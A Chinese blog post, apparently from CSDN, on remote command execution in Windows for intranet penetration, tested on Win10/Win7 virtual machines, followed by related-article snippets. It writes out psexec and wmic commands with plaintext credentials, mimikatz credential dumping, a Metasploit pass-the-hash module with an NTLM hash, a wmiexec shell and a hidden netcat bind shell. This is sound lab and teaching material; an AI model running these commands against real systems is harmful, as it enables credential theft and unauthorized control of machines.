Windows远程执行命令

最新推荐文章于 2024-05-26 08:15:00 发布
最新推荐文章于 2024-05-26 08:15:00 发布
阅读量1w 收藏 22
点赞数 2
分类专栏: 内网渗透 文章标签: 内网渗透 远程命令执行 Windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_Z_W_/article/details/104064528
版权

环境:Win10、Win7虚拟机

Windows远程命令执行

1、psexec.exe远程执行命令

psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe

这里一开始登陆的是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消隐藏,一下就连接上。之后看到一篇文章也有一样的情况,只有Administrator账号才能连接,就算是管理员用户组的其他用户也不能连接,UAC的问题。

2、使用Hash登陆Windows

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

或者使用wce抓取hash值:

msf调用payload:

use exploit/windows/smb/psexec
show options
set RHOST 192.168.30.128
Set SMBPass 0182BD0BD4444BF867CD839BF040D93B:C22B315C040AE6E0EFEE3518D830362B
set SMBUser Administrator
show options
Run

3、利用wmiexec工具配合进行反弹半交互shell

cscript.exe //nologo wmiexec.vbs /shell 192.168.30.128 Administrator 123456789

还可以单条命令执行

4、WMI执行命令方式,无回显

wmic /node:192.168.30.128 /user:Administrator /password:123456789  process call create "cmd.exe /c ipconfig>c:\result.txt"

执行成功后可以在被控制的机器里面找到执行结果的文件

5、nc远程执行

先在被控机器上开启监听,-L:让监听者在连接多次掉线时仍坚持监听,-d:让nc隐藏运行,-e:指定要运行的程序,-p:监听的端口

nc.exe -L -d -e cmd.exe -p 5555

控制端运行nc64.exe 192.168.30.128 5555

 

小晓晓晓林
关注
  • 2
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows远程执行
yyh_linux_note的博客
04-08 1027
本文分享的一些远程执行示例,目的是为了提高用户的安全防范意识以及从安全的角度去考虑如何监控或阻止一些人的恶意手段,大家一定要用在正确的用途上
linux远程执行命令
manongxianfeng的博客
02-26 6248
1.Expect语言实现自动化交互 简介:摘自百度 Expect是一个免费的编程工具语言,用来实现自动和交互式任务进行通信,而无需人的干预。Expect的作者Don Libes在1990年开始编写Expect时对Expect做有如下定义:Expect是一个用来实现自动交互功能的软件套件(Expect [is a] software suite for automating interactive tools)。使用它,系统管理员可以创建脚本来对命令或程序进行输入,而这些命令和程序是期望从终端(termin.
Windows远程执行cmd命令的方法
https://www.cnblogs.com/zpchcbd/
04-15 3万+
觉得对自己有用 于是就记录下来了 WMI执行命令(普通权限可以进行hash传递): 无回显执行:wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>c:\result.txt" 利用wmiexec工具配合进行反弹半交互shell:cscript.e...
命令远程操作windows
PD137的博客
11-09 4339
WinRM服务基于HTTP(HTTPS)协议,使用5985端口(HTTPS使用5986端口)。按照微软官方的介绍:Windows2008 R2以上版本的操作系统,默认开启WinRM服务,因此,在使用时只需将防火墙相应的5985(或5986)端口开放即可;其中,username 是目标计算机上的用户名,remote_computer_ip 是目标计算机的 IP 地址。两台windows电脑的ssh已启动。输入目标计算机上对应用户的密码,以建立 SSH 连接。设置后,操作不报错,有相关信息即可。
Windows远程连接命令
最新发布
2301_78526531的博客
05-26 887
Windows操作系统提供了多种命令,使用户可以通过到远程计算机,并在远程操作系统上执行操作。命令可方便实现远程工作、故障排查和系统维护等任务。本文将介绍几种常见的Windows命令及其基本使用方法。
windows远程控制基本命令
01-21
windows远程控制基本命令远程控制必须熟练的常用命令
Windows PowerShell3-重要的远程
寒冰屋的专栏
01-23 1071
PowerShell作为Windows系统中的默认脚本,其实在开发中,我们用的很少。接下来的几篇文章都将PowerShell的相关知识,在上一章中我们介绍了PowerShell更多的知识,本章我们将深入了解其远程的相关知识。
windows远程命令执行
热门推荐
Shanfenglan's blog
08-26 26万+
以下所有实验均在工作组环境下 psexec psexec.exe \ip –accepteula -u username -p password program.exe psexec.exe \host -accepteula -u domain\username -p password -d -c 获取对方主机的账号密码后且对方开启445端口,可以使用psexec来进行远程命令执行。 psexec \172.16.99.233 -u administrator -p 123 -c cmd.exe .
命令执行漏洞——远程命令执行
weixin_54055099的博客
09-17 3827
命令执行漏洞之远程命令执行的基础操作
常见的远程执行命令方式整理
hl1293348082的专栏
03-30 6941
当我们已经获取了远程系统的凭证(明文密码或 hash)时,可以直接通过3389远程登录进去收集信息、进行下一步的渗透,但是这样做的话会在系统上留下我们的操作记录,而且有可能邂逅管理员。大部分情况下,一个cmdshell 已经可以满足我们继续渗透的需求,所以不到万不得已的时候最好不要远程桌面连接(mstsc),而是通过远程执行命令的方式继续开展工作。本文整理了一些远程执行命令的姿势,测试环境如下: 远程系统: IP:192.168.17.138 用户名:Administrator密码:!@#123
Windows远程执行进程工具psexec和wmiexec介绍
测试开发小记
05-08 3479
在自动化测试或者自动化工具开发中,通常需要向其它电脑或者服务器发送指令,比如Windows发送命令到Linux服务器开启某个服务进程,或者读取状态信息,我们可以使用ssh协议实现。如果Windows主机需要发送命令到局域网内的其它Windows电脑要如何实现呢?在网络安全中称为横向移动的内网渗透方法可实现远程执行命令,横向移动工具有很多,本文介绍psexec和wmiexec这两个工具如何实现远程执行进程。
远程连接相关命令行(windows)
瓜皮弟子头很铁的博客
08-25 2724
restrictedAdmin——在受限管理模式下将你连接到远程PC.在此模式下,将不会向远程PC 发送凭据,如果你连接到的电脑已受到安全威胁,这样做可为你提供保护。/remoteGuard——使用远程防护将你的设备连接到远程设备。远程防护可防止将凭据发送到远程PC,如果你连接到的远程PC已受到安全威胁,这可帮助保护你的凭据。/prompt——在你连接到远程PC时提示你输入凭据。/public——在公共模式下运行远程桌面。/admin——将你连接到会话以管理远程PC./f——在全屏模式下启动远程桌面。
windows远程执行cmd命令的各方式
2ed
11-14 8725
1.WMI执行命令方式,无回显: wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>d:\result.txt" 2.使用Hash直接登录Windows(HASH传递) 抓取windows hash值,得到administrator的...
winrm:Go中Windows远程命令执行命令行工具和库
05-12
WinRM for Go 注意:如果您正在寻找winrm命令行工具,则该工具已从该项目中分离出来,可以在 这是一个Go库,用于通过WinRM / WinRS在Windows计算机上执行远程命令。 注意:此库不支持域用户(它不支持GSSAPI或...
windows常用cmd命令介绍
10-09
Windows操作系统中,CMD(命令提示符)是一个强大的工具,它允许用户通过文本命令与操作系统交互,执行各种系统管理、文件操作和网络诊断任务。掌握CMD命令是提升工作效率的关键,尤其是对于IT专业人员和网络管理...
如何使用Go语言实现远程执行命令
01-03
远程执行命令有什么用?为什么要远程执行命令? 如果你只有2,3台服务器需要管理的时候,远程执行命令确实没有没多大作用,你可以登录到每台服务器上去完成各种操作。 当你的服务器大于3台的时候,远程执行命令的...
Windows远程访问管理工具
09-08
至于“windows远程访问”,Windows操作系统内置了Remote Desktop Services,即RDP,它允许用户通过图形界面远程控制另一台运行Windows的电脑。虽然RDP和SSH都是远程访问工具,但它们在安全性和使用场景上有所不同。...
Windows 远程控制之 PsExec
一直被模仿,从未被超越
01-12 1910
PsExec 是一种轻量级 telnet 替代品,可让你在其他系统上执行进程,并为控制台应用程序提供完整交互性,而无需手动安装客户端软件。PsExec 最强大的用途包括在远程系统上启动交互式命令提示符,以及 IpConfig 等远程启用工具,否则无法显示有关远程系统的信息。远程打开 cmd 命令
Windows远程管理WinRM,Enter-PSSession
tiger57的博客
02-03 3557
Windows远程管理WinRM,Enter-PSSession
buuctf windows渗透
07-27
对于buuctf windows渗透的问题,根据提供的引用内容,我无法找到与buuctf windows渗透直接相关的信息。引用\[1\]提到了一些关于页面和点击属性的内容,引用\[2\]则是一个POC代码,引用\[3\]则是关于referer的内容。请提供更多关于buuctf windows渗透的信息,以便我能够为您提供更准确的答案。 #### 引用[.reference_title] - *1* *3* [BUUCTF解题web十一道](https://blog.csdn.net/qq_45837896/article/details/117262823)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [BUUCTF笔记之Real部分WP(二)](https://blog.csdn.net/shuaicenglou3032/article/details/117571062)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值